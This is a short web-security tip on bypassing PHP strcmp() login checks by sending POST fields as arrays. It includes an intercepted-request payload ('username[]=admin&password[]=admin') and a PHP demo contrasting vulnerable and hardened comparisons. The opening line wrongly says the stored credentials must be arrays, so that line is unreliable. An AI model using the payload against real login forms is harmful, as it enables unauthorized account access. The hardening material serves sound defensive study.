PHP strcmp() bypass

Given a strcmp() comparison between a variable and a POST parameter value that looks like this:

[...]
if (strcmp($username, $_POST['username']) == 0) {
    if (strcmp($password, $_POST['password']) == 0) {   
[...]

If $username and $password are arrays, sending the POST values as arrays too will make both strcmp() calls evaluate to 0. Using the Burp Suite proxy, intercept the HTTP request and change the POST parameters from

username=admin&password=admin

to

username[]=admin&password[]=admin
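
The check above next to a hardened form, as an added example that is not part of the original page. The function names, the constants and the sample credentials are assumptions made for the demo. On PHP before 8.0, strcmp() given an array emits a warning and returns NULL, which the loose `== 0` accepts; PHP 8.0 and later throw a TypeError instead.

```php
<?php
// Constructed sample credentials (assumption, not from the page).
const STORED_USER = 'admin';
const STORED_PASS = 'constructed-sample-password';

// The page's pattern: loose == applied to strcmp()'s return value.
function login_loose(array $post): bool
{
    try {
        // PHP < 8: an array argument makes strcmp() warn and return NULL,
        // and NULL == 0 is true under loose comparison.
        return @strcmp(STORED_USER, $post['username'] ?? '') == 0
            && @strcmp(STORED_PASS, $post['password'] ?? '') == 0;
    } catch (TypeError $e) {
        // PHP >= 8: strcmp() throws TypeError for an array argument.
        return false;
    }
}

// Hardened: accept only strings, then compare strictly.
function login_strict(array $post): bool
{
    $user = $post['username'] ?? null;
    $pass = $post['password'] ?? null;
    // name[]=value arrives as an array; a missing field arrives as null.
    if (!is_string($user) || !is_string($pass)) {
        return false;
    }
    // hash_equals() returns a real bool and is a timing-safe comparison.
    // Evaluate both so the result does not short-circuit on the username.
    $okUser = hash_equals(STORED_USER, $user);
    $okPass = hash_equals(STORED_PASS, $pass);
    return $okUser && $okPass;
}

// Constructed inputs shaped like $_POST after PHP parses the request body.
$cases = [
    'correct strings' => ['username' => 'admin', 'password' => 'constructed-sample-password'],
    'wrong password'  => ['username' => 'admin', 'password' => 'admin'],
    'array values'    => ['username' => ['admin'], 'password' => ['admin']],
];
foreach ($cases as $label => $post) {
    printf("%-16s loose=%s strict=%s\n", $label,
        var_export(login_loose($post), true),
        var_export(login_strict($post), true));
}
```

Run with the PHP CLI on both a 7.x and an 8.x interpreter to see the `array values` row differ for `login_loose` while `login_strict` rejects it on both. An application that stores password hashes would replace the password comparison with password_verify().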